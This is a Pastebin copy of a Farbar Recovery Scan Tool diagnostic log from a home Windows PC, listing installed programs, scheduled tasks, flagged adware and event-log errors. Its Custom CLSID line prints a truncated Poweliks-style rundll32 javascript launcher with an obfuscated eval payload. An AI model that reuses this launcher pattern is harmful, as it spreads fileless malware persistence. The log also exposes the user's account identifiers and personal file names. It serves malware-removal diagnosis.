Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Additional scan result of Farbar Recovery Scan Tool (x64) Version: 01-11-2014
- Ran by Owner at 2014-11-01 19:09:27
- Running from C:\Users\Owner\Desktop
- Boot Mode: Normal
- ==========================================================
- ==================== Security Center ========================
- (If an entry is included in the fixlist, it will be removed.)
- AV: Norton AntiVirus (Enabled - Up to date) {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
- AS: Norton AntiVirus (Enabled - Up to date) {631E4324-D31C-783F-EC5C-35AD42B18466}
- AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
- ==================== Installed Programs ======================
- (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
- 4500_G510gm_Help_Web (x32 Version: 000.0.440.000 - Hewlett-Packard) Hidden
- 4500G510gm_Software_Min (x32 Version: 000.0.423.000 - Hewlett-Packard) Hidden
- 4500G510gm_web (x32 Version: 000.0.425.000 - Hewlett-Packard) Hidden
- 64 Bit HP CIO Components Installer (Version: 6.2.1 - Hewlett-Packard) Hidden
- Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.189 - Adobe Systems Incorporated)
- Apple Application Support (HKLM-x32\...\{5D09C772-ECB3-442B-9CC6-B4341C78FDC2}) (Version: 2.3.4 - Apple Inc.)
- Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
- BufferChm (x32 Version: 130.0.331.000 - Hewlett-Packard) Hidden
- Corel Graphics - Windows Shell Extension (HKLM-x32\...\_{B6BFCD02-BA0E-41A9-9C9C-6624C4BB475F}) (Version: 15.2.0.686 - Corel Corporation)
- Corel Graphics - Windows Shell Extension (x32 Version: 15.2.686 - Corel Corporation) Hidden
- Corel Graphics - Windows Shell Extension 64 Bit (Version: 15.2.686 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - BR (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - Capture (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - Common (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - Connect (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - Custom Data (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - DE (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - Draw (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - EN (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - ES (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - Filters (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - FontNav (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - FR (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - IPM (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - IT (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - JP (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - PHOTO-PAINT (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - Photozoom Plugin (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - Redist (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - Setup Files (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - VBA (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - VideoBrowser (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - VSTA (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 - WT (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW Graphics Suite X5 (x32 Version: 15.3 - Corel Corporation) Hidden
- CorelDRAW(R) Graphics Suite X5 (HKLM-x32\...\_{CE54DCE1-E00A-4D91-ACB9-A2D916C24051}) (Version: 15.2.0.686 - Corel Corporation)
- DriverUpdate (HKLM-x32\...\{850A14FC-F410-47F7-94E4-38F4D3F270D4}) (Version: 2.2.30452 - SlimWare Utilities, Inc.)
- Embrilliance version BriTon Leap Embrilliance 1.132 (HKLM\...\{CD06BE8E-4E09-4FC6-9098-94F0D6FE86F1}_is1) (Version: BriTon Leap Embrilliance 1.132 - BriTon Leap, Inc.)
- Embroidery Fonts Plus (HKLM-x32\...\{9E659749-F928-4D70-BFC0-AD504CCDA3C5}) (Version: 2.0.0000 - Soft Sight, Inc.)
- Ghostscript GPL 8.64 (Msi Setup) (HKLM-x32\...\_{06CD45E6-FF5E-4D8E-BC01-B276A90DADF2}) (Version: 8.64 - Corel Corporation)
- Ghostscript GPL 8.64 (Msi Setup) (x32 Version: 8.64 - Corel Corporation) Hidden
- Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.)
- Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
- HitmanPro 3.7 (HKLM\...\HitmanPro37) (Version: 3.7.9.232 - SurfRight B.V.)
- HP Officejet 4500 G510g-m (HKLM\...\{B38968E0-778F-47C3-8781-BAD4E497801C}) (Version: 13.0 - HP)
- Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1118 - Intel Corporation)
- Intel(R) Network Connections 15.6.25.0 (HKLM\...\PROSetDX) (Version: 15.6.25.0 - Intel)
- Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.2867 - Intel Corporation)
- Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.0.0.1046 - Intel Corporation)
- Java 7 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
- LG CyberLink Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.2.4009 - CyberLink Corp.)
- LG CyberLink Power2Go (x32 Version: 6.2.4009 - CyberLink Corp.) Hidden
- LG Power Tools (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 6.0.3316 - CyberLink Corp.)
- LG Power Tools (x32 Version: 6.0.3316 - CyberLink Corp.) Hidden
- Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
- Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
- Microsoft SQL Server 2005 (HKLM-x32\...\Microsoft SQL Server 2005) (Version: - Microsoft Corporation)
- Microsoft SQL Server Native Client (HKLM\...\{9ACF3FDB-C8E6-444C-8C64-13A221F7BFFD}) (Version: 9.00.5000.00 - Microsoft Corporation)
- Microsoft SQL Server Setup Support Files (English) (HKLM-x32\...\{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}) (Version: 9.00.5000.00 - Microsoft Corporation)
- Microsoft SQL Server VSS Writer (HKLM\...\{B636C9B9-A3F2-4DCE-ADCC-72E095018385}) (Version: 9.00.5000.00 - Microsoft Corporation)
- Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
- Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
- Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
- Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
- Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
- Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
- Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
- Microsoft Visual Studio Tools for Applications 2.0 - ENU (HKLM-x32\...\{AA4A4B2C-0465-3CF8-BA76-27A027D8ACAB}) (Version: 9.0.30729 - Microsoft Corporation)
- Microsoft Visual Studio Tools for Applications 2.0 Runtime (HKLM-x32\...\{299C0434-4F4E-341F-A916-4E07AEB35E79}) (Version: 9.0.30729 - Microsoft Corporation)
- MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
- MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
- MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
- Network64 (Version: 130.0.550.000 - Hewlett-Packard) Hidden
- Norton AntiVirus (HKLM-x32\...\NAV) (Version: 21.6.0.32 - Symantec Corporation)
- Norton Identity Safe (HKLM-x32\...\NST) (Version: 2014.7.8.23 - Symantec Corporation)
- Norton PC Checkup (HKLM-x32\...\Norton PC Checkup_is1) (Version: 3.0.2.122.0 - NortonLive Services)
- OpenOffice 4.0.0 (HKLM-x32\...\{55E61709-D7D4-43C0-B45D-BFAF5C09A02D}) (Version: 4.00.9702 - Apache Software Foundation)
- QuickTime (HKLM-x32\...\{B67BAFBA-4C9F-48FA-9496-933E3B255044}) (Version: 7.74.80.86 - Apple Inc.)
- QuickTime Free Download Packages (HKCU\...\QuickTime Free Download Packages) (Version: - ) <==== ATTENTION
- Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6215 - Realtek Semiconductor Corp.)
- Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.0.4.0 - Renesas Electronics Corporation)
- Renesas Electronics USB 3.0 Host Controller Driver (x32 Version: 2.0.4.0 - Renesas Electronics Corporation) Hidden
- Scan (x32 Version: 13.0.0.0 - Hewlett-Packard) Hidden
- Sentinel Protection Installer 7.6.1 (HKLM-x32\...\{7B1AA2AB-ACD2-45C7-B1B1-364BEA40615F}) (Version: 7.6.1 - SafeNet, Inc.)
- Strongvault Online Backup (HKLM-x32\...\{692EF506-1E15-4473-A829-ED951D6C49DB}) (Version: 2.0.0 - Strongvault) <==== ATTENTION
- swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
- Tajima DG/ML By Pulse 12 (HKLM-x32\...\InstallShield_{8A76F64A-1F32-4C9B-8B3A-FC92177069F3}) (Version: 12.1.3578 - Pulse Microsystems Ltd.)
- Tajima DG/ML By Pulse 12 (x32 Version: 12.1.3578 - Pulse Microsystems Ltd.) Hidden
- Tajima DGML By Pulse 14 (HKLM-x32\...\Tajima DGML By Pulse 14) (Version: 14.1.5367 - Pulse Microsystems Ltd.)
- Tajima DGML By Pulse 14 (x32 Version: 14.1.5367 - Pulse Microsystems Ltd.) Hidden
- Toolbox (x32 Version: 130.0.648.000 - Hewlett-Packard) Hidden
- WebReg (x32 Version: 130.0.132.017 - Hewlett-Packard) Hidden
- Yahoo! Software Update (HKLM-x32\...\Yahoo! Software Update) (Version: - )
- ==================== Custom CLSID (selected items): ==========================
- (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
- CustomCLSID: HKU\S-1-5-21-3808024246-114040771-358346857-1002_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
- ==================== Restore Points =========================
- 31-10-2014 03:12:43 Removed Adobe Reader XI (11.0.09).
- 31-10-2014 03:31:10 Configured PowerStarter
- 01-11-2014 22:38:15 Installed Java 7 Update 71
- 01-11-2014 23:46:33 Checkpoint by HitmanPro
- 01-11-2014 23:47:11 Checkpoint by HitmanPro
- ==================== Hosts content: ==========================
- (If needed Hosts: directive could be included in the fixlist to reset Hosts.)
- 2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____N C:\Windows\system32\Drivers\etc\hosts
- ==================== Scheduled Tasks (whitelisted) =============
- (If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
- Task: {19BCA226-20E9-472E-A717-9FC301ECB827} - System32\Tasks\Norton AntiVirus\Norton Error Analyzer => C:\Program Files (x86)\Norton AntiVirus\Engine\21.6.0.32\SymErr.exe [2014-01-30] (Symantec Corporation)
- Task: {266F5F6E-BF4D-47E8-8800-D2140AE5C318} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-11-01] (Google Inc.)
- Task: {3F3C7940-E49A-466F-BD28-DF18B2956EAA} - System32\Tasks\Test TimeTrigger => C:\Users\Owner\AppData\Local\Temp\Runner.exe <==== ATTENTION
- Task: {4F022BC7-D5D1-4F58-A3DD-71EC9BF0AA43} - System32\Tasks\Norton Identity Safe\Norton Error Analyzer => C:\Program Files (x86)\Norton Identity Safe\Engine\2014.7.8.23\SymErr.exe [2014-01-30] (Symantec Corporation)
- Task: {5EBC048E-97AC-4342-A37B-693E4DA56207} - System32\Tasks\Norton Identity Safe\Norton Error Processor => C:\Program Files (x86)\Norton Identity Safe\Engine\2014.7.8.23\SymErr.exe [2014-01-30] (Symantec Corporation)
- Task: {7E2BF364-8A5E-47FD-8E33-56A6B087CE64} - \BrowserSafeguard Update Task No Task File <==== ATTENTION
- Task: {891A1543-13F3-4228-833F-4F3D66FB00DD} - \ProgramRefresh-ATFST No Task File <==== ATTENTION
- Task: {8C1D3AAC-83CB-4ADE-B971-0CAE1B8E9EDB} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-11-01] (Google Inc.)
- Task: {9842888F-0BDA-48C4-B70E-5760B6A1329A} - System32\Tasks\DriverUpdate Startup => C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe [2013-06-22] (SlimWare Utilities, Inc.)
- Task: {9A086EE7-5ADA-4B0A-8416-4E20BAF32BA0} - System32\Tasks\Norton AntiVirus\Norton Error Processor => C:\Program Files (x86)\Norton AntiVirus\Engine\21.6.0.32\SymErr.exe [2014-01-30] (Symantec Corporation)
- Task: {9F3A4E80-BC48-44EB-8BB0-6587894DB816} - System32\Tasks\{107F41FE-AE6C-4845-BD94-D3084CE271EA} => Chrome.exe
- Task: {A0773E1F-B542-4055-BA16-2D1CD55B2881} - \ProgramUpdateCheck No Task File <==== ATTENTION
- Task: {A6CA6EAA-6579-4965-8911-E3269A9FBA65} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
- Task: {ACB05778-B525-4E9A-A1E4-3B20DEEAE4D5} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-11-01] (Adobe Systems Incorporated)
- Task: {B78A2B77-4A7E-47B0-B1A1-05518ED448DE} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton AntiVirus\Engine\21.6.0.32\WSCStub.exe [2014-09-21] (Symantec Corporation)
- Task: {CC1869E6-0CBD-4101-A577-B958D74DBFCF} - System32\Tasks\Microsoft\Windows\WindowsBackup\AutomaticBackup => Rundll32.exe /d sdengin2.dll,ExecuteScheduledBackup
- Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
- Task: C:\Windows\Tasks\DriverUpdate Startup.job => C:\Program Files (x86)\DriverUpdate\DriverUpdate.exe
- Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
- Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
- ==================== Loaded Modules (whitelisted) =============
- 2012-10-10 02:22 - 2012-10-10 02:22 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
- 2009-12-15 13:46 - 2009-12-15 13:46 - 00619816 ____N () C:\Program Files (x86)\CyberLink\Power2Go\CLMediaLibrary.dll
- 2009-12-15 13:49 - 2009-12-15 13:49 - 00013096 ____N () C:\Program Files (x86)\CyberLink\Power2Go\CLMLSvcPS.dll
- 2009-07-13 16:03 - 2009-07-13 20:15 - 00364544 _____ () C:\Windows\SysWOW64\msjetoledb40.dll
- 2014-10-16 03:44 - 2014-10-16 03:44 - 00169472 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\ba8588c3319d63350220ec2ac3eb2c36\IsdiInterop.ni.dll
- 2013-01-11 11:21 - 2010-09-13 18:28 - 00058880 _____ () C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IsdiInterop.dll
- ==================== Alternate Data Streams (whitelisted) =========
- (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
- AlternateDataStreams: C:\ProgramData\Temp:373E1720
- AlternateDataStreams: C:\ProgramData\Temp:56E2E879
- AlternateDataStreams: C:\Users\Owner\Documents\craig1.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\craig1.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\craig2.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\craig2.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\craig3.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\craig3.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\craig4.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\craig4.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\Dad1.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\Dad1.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\Dad2.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\Dad2.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\Dad3.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\Dad3.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\ginibd.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\ginibd.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\graduation.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\graduation.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\IM1.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\IM1.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\IM2.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\IM2.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\IM3.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\IM3.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\IM4.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\IM4.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\LEXMG.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\LEXMG.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\M&G.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\M&G.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\Mardi Gras 1980.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\Mardi Gras 1980.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\pink dress.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\pink dress.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\Regency Hospital Company.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\Regency Hospital Company.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\Regency Hospital Company2.bmp:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\Regency Hospital Company2.bmp:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\rhc.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\rhc.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\s. vaccaro.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\s. vaccaro.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\Documents\TN logo.jpeg:3or4kl4x13tuuug3Byamue2s4b
- AlternateDataStreams: C:\Users\Owner\Documents\TN logo.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}
- AlternateDataStreams: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Yahoo!.website:TASKICON_0favicon-2079221766
- AlternateDataStreams: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Yahoo!.website:TASKICON_1favicon1313128964
- AlternateDataStreams: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Yahoo!.website:TASKICON_2favicon-2092717923
- ==================== Safe Mode (whitelisted) ===================
- (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
- HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\plsapp => ""="service"
- ==================== EXE Association (whitelisted) =============
- (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
- ==================== MSCONFIG/TASK MANAGER disabled items =========
- (Currently there is no automatic fix for this section.)
- MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^StrongVaultApp.exe.lnk => C:\Windows\pss\StrongVaultApp.exe.lnk.CommonStartup
- MSCONFIG\startupreg: CouponXplorer_5z Browser Plugin Loader 64 => C:\PROGRA~2\COUPON~2\bar\1.bin\5zbrmon64.exe
- MSCONFIG\startupreg: ShopAtHomeWatcher => C:\Users\Owner\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeWatcher.exe
- ========================= Accounts: ==========================
- Administrator (S-1-5-21-3808024246-114040771-358346857-500 - Administrator - Disabled)
- Guest (S-1-5-21-3808024246-114040771-358346857-501 - Limited - Disabled)
- HomeGroupUser$ (S-1-5-21-3808024246-114040771-358346857-1003 - Limited - Enabled)
- Owner (S-1-5-21-3808024246-114040771-358346857-1002 - Administrator - Enabled) => C:\Users\Owner
- ==================== Faulty Device Manager Devices =============
- Name: qknfd
- Description: qknfd
- Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
- Manufacturer:
- Service: qknfd
- Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
- Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
- Devices stay in this state if they have been prepared for removal.
- After you remove the device, this error disappears.Remove the device, and this error should be resolved.
- Name: Officejet 6700
- Description: Officejet 6700
- Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
- Manufacturer: HP
- Service:
- Problem: : This device is disabled. (Code 22)
- Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
- ==================== Event log errors: =========================
- Application errors:
- ==================
- Error: (11/01/2014 06:51:42 PM) (Source: WinMgmt) (EventID: 10) (User: )
- Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
- Error: (11/01/2014 06:50:38 PM) (Source: DesignSpooler) (EventID: 2) (User: NT AUTHORITY)
- Description: Pulse Design Spooler is shutting down. Security Device Error - Please attach your security device.
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x0000026c,SYSTEM\CurrentControlSet\Services\VSS\Diag\VssvcPublisher,0,REG_BINARY,0000000002D2EB10.72). hr = 0x80070005, Access is denied.
- .
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000d78,(null),0,REG_BINARY,00000000098FDD30.72). hr = 0x80070005, Access is denied.
- .
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {cd3f2362-8bef-46c7-9181-d62844cdc0b2}
- Writer Name: MSSearch Service Writer
- Writer Instance ID: {14ce3ae3-8162-40cd-a0d5-a852f74bd3aa}
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000d78,(null),0,REG_BINARY,00000000098FDD30.72). hr = 0x80070005, Access is denied.
- .
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {cd3f2362-8bef-46c7-9181-d62844cdc0b2}
- Writer Name: MSSearch Service Writer
- Writer Instance ID: {14ce3ae3-8162-40cd-a0d5-a852f74bd3aa}
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000644,(null),0,REG_BINARY,0000000002BEE180.72). hr = 0x80070005, Access is denied.
- .
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0}
- Writer Name: WMI Writer
- Writer Instance ID: {357e23c8-7333-4443-8351-b9c96a4ce42d}
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x000001ec,(null),0,REG_BINARY,0000000002AFEA00.72). hr = 0x80070005, Access is denied.
- .
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f}
- Writer Name: Shadow Copy Optimization Writer
- Writer Instance ID: {043545d9-2944-4e8f-8adc-a463570ed7f2}
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x000001b0,(null),0,REG_BINARY,0000000002B7EAD0.72). hr = 0x80070005, Access is denied.
- .
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {afbab4a2-367d-4d15-a586-71dbb18f8485}
- Writer Name: Registry Writer
